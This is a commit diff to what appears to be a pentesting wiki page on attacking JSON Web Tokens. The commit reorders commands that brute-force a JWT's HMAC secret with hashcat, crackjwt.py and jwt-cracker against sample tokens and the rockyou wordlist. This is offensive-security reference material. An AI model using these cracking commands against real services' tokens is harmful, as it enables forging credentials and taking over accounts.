GitBook: [master] one page modified

carlospolop · gitbook-bot · commit 62eac91af905 · 2021-03-08T16:08:00.000Z
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -45,9 +45,10 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a
 ## Brute-force HMAC secret
 
 ```bash
-git clone https://github.com/Sjord/jwtcrack.git
-cd jwtcrack
-#Bruteforce using crackjwt.py
+#hashcat
+hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
+
+#https://github.com/Sjord/jwtcrack
 python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
 
 #John
@@ -64,9 +65,6 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w
 
 #https://github.com/lmammino/jwt-cracker
 jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
-
-#hashcat
-hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
 ```
 
 ## Modify the algorithm to None \(CVE-2015-9235\)
